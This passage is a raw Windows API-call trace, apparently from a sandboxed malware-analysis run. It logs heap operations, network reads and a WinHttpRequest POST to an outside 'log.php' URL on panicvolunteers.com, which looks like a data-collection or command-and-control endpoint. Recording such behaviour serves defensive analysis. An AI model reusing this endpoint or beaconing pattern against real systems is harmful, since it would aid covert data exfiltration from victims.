(HeapHandle=0xc60000, Flags=0x0, Size=0x2b) returned 0xed8220 [0254.451] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xed8220, dwNumberOfBytesToRead=0x2b, lpdwNumberOfBytesRead=0x87e8c0 | out: lpBuffer=0xed8220*, lpdwNumberOfBytesRead=0x87e8c0*=0x2b) returned 1 [0254.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83128 [0254.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe266c8 [0254.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x2b) returned 0xed8258 [0254.451] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xed8258, dwNumberOfBytesToRead=0x2b, lpdwNumberOfBytesRead=0x87e8c0 | out: lpBuffer=0xed8258*, lpdwNumberOfBytesRead=0x87e8c0*=0x0) returned 1 [0254.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed8258 | out: hHeap=0xc60000) returned 1 [0254.452] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0254.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca9288 | out: hHeap=0xc60000) returned 1 [0254.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a78 | out: hHeap=0xc60000) returned 1 [0254.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9f270 | out: hHeap=0xc60000) returned 1 [0254.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a68 | out: hHeap=0xc60000) returned 1 [0254.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9f248 | out: hHeap=0xc60000) returned 1 [0254.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a58 | out: hHeap=0xc60000) returned 1 [0254.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a198 | out: hHeap=0xc60000) returned 1 [0254.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a48 | out: hHeap=0xc60000) returned 1 [0254.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a180 | out: hHeap=0xc60000) returned 1 [0254.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a38 | out: hHeap=0xc60000) returned 1 [0254.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9f1f8 | out: hHeap=0xc60000) returned 1 [0254.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a28 | out: hHeap=0xc60000) returned 1 [0254.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a150 | out: hHeap=0xc60000) returned 1 [0254.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a18 | out: hHeap=0xc60000) returned 1 [0254.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1a18 [0254.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x2b) returned 0xca9288 [0254.452] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0254.453] InternetCloseHandle (hInternet=0xcc0008) returned 0 [0254.453] CloseHandle (hObject=0x0) returned 0 [0254.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed8220 | out: hHeap=0xc60000) returned 1 [0254.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe266c8 | out: hHeap=0xc60000) returned 1 [0254.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83128 | out: hHeap=0xc60000) returned 1 [0254.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a138 | out: hHeap=0xc60000) returned 1 [0254.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca19f8 | out: hHeap=0xc60000) returned 1 [0254.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xce39e8 | out: hHeap=0xc60000) returned 1 [0254.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca19e8 | out: hHeap=0xc60000) returned 1 [0254.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xce3938 | out: hHeap=0xc60000) returned 1 [0254.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a08 | out: hHeap=0xc60000) returned 1 [0254.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a120 | out: hHeap=0xc60000) returned 1 [0254.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a108 | out: hHeap=0xc60000) returned 1 [0254.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e528 | out: hHeap=0xc60000) returned 1 [0254.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca19d8 | out: hHeap=0xc60000) returned 1 [0254.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x2c) returned 0xed8220 [0254.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca19d8 [0254.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x58) returned 0xe3bd60 [0254.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a08 [0254.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xed8220, cbMultiByte=44, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 44 [0254.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x58) returned 0xe3be20 [0254.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xed8220, cbMultiByte=44, lpWideCharStr=0xe3be20, cchWideChar=44 | out: lpWideCharStr="https://panicvolunteers.com/bgr/log/log.php") returned 44 [0254.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe3be20 | out: hHeap=0xc60000) returned 1 [0254.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a108 [0254.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed8220 | out: hHeap=0xc60000) returned 1 [0254.454] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca19d8 | out: hHeap=0xc60000) returned 1 [0254.454] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca9288 | out: hHeap=0xc60000) returned 1 [0254.454] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a18 | out: hHeap=0xc60000) returned 1 [0254.454] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0d8 | out: hHeap=0xc60000) returned 1 [0254.454] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e500 | out: hHeap=0xc60000) returned 1 [0254.454] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1998 | out: hHeap=0xc60000) returned 1 [0254.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e500 [0254.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0d8 [0254.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1998 [0254.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a120 [0254.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a138 [0254.454] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a108 | out: hHeap=0xc60000) returned 1 [0254.454] PeekMessageW (in: lpMsg=0x87ef6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ef6c) returned 1 [0254.454] TranslateMessage (lpMsg=0x87ef6c) returned 0 [0254.454] DispatchMessageW (lpMsg=0x87ef6c) returned 0x0 [0254.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xcb2140 [0254.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a18 [0254.454] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e608) returned 1 [0254.455] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcb2140 | out: hHeap=0xc60000) returned 1 [0254.455] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a18 | out: hHeap=0xc60000) returned 1 [0254.455] KillTimer (hWnd=0x30172, uIDEvent=0x1) returned 1 [0254.455] SetTimer (hWnd=0x30172, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0254.455] PeekMessageW (in: lpMsg=0x87ef6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ef6c) returned 0 [0254.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1a18 [0254.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca19d8 [0254.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xcb2140 [0254.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca19e8 [0254.455] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcb2140 | out: hHeap=0xc60000) returned 1 [0254.455] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca19e8 | out: hHeap=0xc60000) returned 1 [0254.455] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca19d8 | out: hHeap=0xc60000) returned 1 [0254.456] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a18 | out: hHeap=0xc60000) returned 1 [0254.456] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xcacc30 [0254.456] PeekMessageW (in: lpMsg=0x87ef6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ef6c) returned 0 [0254.456] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1a18 [0254.456] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a108 [0254.456] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a18 | out: hHeap=0xc60000) returned 1 [0254.456] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a918 [0254.456] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a108 | out: hHeap=0xc60000) returned 1 [0254.456] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcacc30 | out: hHeap=0xc60000) returned 1 [0254.456] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a108 [0254.456] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a918 | out: hHeap=0xc60000) returned 1 [0254.456] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9b318 | out: hHeap=0xc60000) returned 1 [0254.456] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0f0 | out: hHeap=0xc60000) returned 1 [0254.456] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0c0 | out: hHeap=0xc60000) returned 1 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0a8 | out: hHeap=0xc60000) returned 1 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc850e0 | out: hHeap=0xc60000) returned 1 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e4d8 | out: hHeap=0xc60000) returned 1 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a138 | out: hHeap=0xc60000) returned 1 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a120 | out: hHeap=0xc60000) returned 1 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0d8 | out: hHeap=0xc60000) returned 1 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1998 | out: hHeap=0xc60000) returned 1 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e500 | out: hHeap=0xc60000) returned 1 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a060 | out: hHeap=0xc60000) returned 1 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca19a8 | out: hHeap=0xc60000) returned 1 [0254.457] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a060 [0254.457] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0d8 [0254.457] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca19a8 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a108 | out: hHeap=0xc60000) returned 1 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca19a8 | out: hHeap=0xc60000) returned 1 [0254.457] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a108 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79f88 | out: hHeap=0xc60000) returned 1 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79f70 | out: hHeap=0xc60000) returned 1 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79fa0 | out: hHeap=0xc60000) returned 1 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79fd0 | out: hHeap=0xc60000) returned 1 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79fb8 | out: hHeap=0xc60000) returned 1 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79fe8 | out: hHeap=0xc60000) returned 1 [0254.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a000 | out: hHeap=0xc60000) returned 1 [0254.458] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a018 | out: hHeap=0xc60000) returned 1 [0254.458] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a030 | out: hHeap=0xc60000) returned 1 [0254.458] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a048 | out: hHeap=0xc60000) returned 1 [0254.458] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e488 | out: hHeap=0xc60000) returned 1 [0254.458] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a048 [0254.458] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca19a8 [0254.458] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xd824f0 [0254.458] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xa) returned 0xd7a030 [0254.458] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xca3298, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x87f148*="Open", cNames=0x1, lcid=0x800, rgDispId=0x87f24c | out: rgDispId=0x87f24c*=1) returned 0x0 [0254.458] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a030 | out: hHeap=0xc60000) returned 1 [0254.458] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xca3298, iTInfo=0x0, lcid=0x800, ppTInfo=0x87f140 | out: ppTInfo=0x87f140*=0xe0cdb4) returned 0x0 [0254.465] ITypeInfo:RemoteGetTypeAttr (in: This=0xe0cdb4, ppTypeAttr=0x87f138, pDummy=0x356310 | out: ppTypeAttr=0x87f138, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.466] ITypeInfo:LocalGetIDsOfNames (This=0xe0cdb4) returned 0x0 [0254.466] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x0, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.469] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xcc1b80 [0254.469] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x1, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.469] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xc9b318 [0254.469] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x2, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.469] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xc9b318 [0254.469] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x3, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.469] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xcc1b80 [0254.469] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x4, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.469] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xcc1b80 [0254.469] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x5, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.469] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe65bb0 [0254.469] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x6, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.470] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.470] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x7, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.470] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xcc1b80 [0254.470] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x8, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.470] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xcc1b80 [0254.470] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x9, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.470] ITypeInfo:LocalReleaseTypeAttr (This=0xe0cdb4) returned 0xe47b90 [0254.470] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xcc1b80 [0254.470] WinHttpRequest:IUnknown:Release (This=0xe0cdb4) returned 0x1 [0254.470] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x44) returned 0xe86b38 [0254.470] WinHttpRequest:IDispatch:Invoke (in: This=0xca3298, dispIdMember=1, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x87f230*(rgvarg=([0]=0xe86b3c*(varType=0xb, wReserved1=0x0, wReserved2=0x1b84, wReserved3=0xcc, varVal1=0x0, varVal2=0x0), [1]=0xe86b4c*(varType=0x8, wReserved1=0xe7, wReserved2=0x0, wReserved3=0x0, varVal1="https://panicvolunteers.com/bgr/log/log.php", varVal2=0x0), [2]=0xe86b5c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f1f8, puArgErr=0x87f240 | out: pDispParams=0x87f230*(rgvarg=([0]=0xe86b3c*(varType=0xb, wReserved1=0x0, wReserved2=0x1b84, wReserved3=0xcc, varVal1=0x0, varVal2=0x0), [1]=0xe86b4c*(varType=0x8, wReserved1=0xe7, wReserved2=0x0, wReserved3=0x0, varVal1="https://panicvolunteers.com/bgr/log/log.php", varVal2=0x0), [2]=0xe86b5c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f1f8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x87f240*=0x2b5995) returned 0x0 [0254.474] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd824f0 | out: hHeap=0xc60000) returned 1 [0254.474] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0c0 [0254.475] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0f0 [0254.475] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a68 [0254.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe86b38 | out: hHeap=0xc60000) returned 1 [0254.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a048 | out: hHeap=0xc60000) returned 1 [0254.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca19a8 | out: hHeap=0xc60000) returned 1 [0254.475] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a048 [0254.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0c0 | out: hHeap=0xc60000) returned 1 [0254.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79f28 | out: hHeap=0xc60000) returned 1 [0254.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca19c8 | out: hHeap=0xc60000) returned 1 [0254.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a090 | out: hHeap=0xc60000) returned 1 [0254.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a078 | out: hHeap=0xc60000) returned 1 [0254.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe3bd60 | out: hHeap=0xc60000) returned 1 [0254.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a08 | out: hHeap=0xc60000) returned 1 [0254.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0d8 | out: hHeap=0xc60000) returned 1 [0254.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a060 | out: hHeap=0xc60000) returned 1 [0254.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a108 | out: hHeap=0xc60000) returned 1 [0254.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e4b0 | out: hHeap=0xc60000) returned 1 [0254.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b78 | out: hHeap=0xc60000) returned 1 [0254.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0f0 | out: hHeap=0xc60000) returned 1 [0254.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a68 | out: hHeap=0xc60000) returned 1 [0254.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a048 | out: hHeap=0xc60000) returned 1 [0254.476] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0254.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1a68 [0254.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a048 [0254.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1b78 [0254.476] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a048 | out: hHeap=0xc60000) returned 1 [0254.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xed8220 [0254.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e4b0 [0254.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a048 [0254.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0f0 [0254.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a108 [0254.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a060 [0254.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0d8 [0254.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a078 [0254.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1a08 [0254.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a090 [0254.476] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a08 | out: hHeap=0xc60000) returned 1 [0254.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe832e0 [0254.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f28 [0254.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0c0 [0254.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1a08 [0254.476] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a090 | out: hHeap=0xc60000) returned 1 [0254.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a090 [0254.476] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a08 | out: hHeap=0xc60000) returned 1 [0254.477] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a918 [0254.477] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a150 [0254.477] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a090 | out: hHeap=0xc60000) returned 1 [0254.477] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0f0 | out: hHeap=0xc60000) returned 1 [0254.477] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a048 | out: hHeap=0xc60000) returned 1 [0254.477] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a108 | out: hHeap=0xc60000) returned 1 [0254.477] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0d8 | out: hHeap=0xc60000) returned 1 [0254.477] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a060 | out: hHeap=0xc60000) returned 1 [0254.477] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a078 | out: hHeap=0xc60000) returned 1 [0254.477] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e4b0 | out: hHeap=0xc60000) returned 1 [0254.477] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a078 [0254.477] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a08 [0254.477] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xd824f0 [0254.477] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x22) returned 0xe976b0 [0254.477] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xca3298, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, 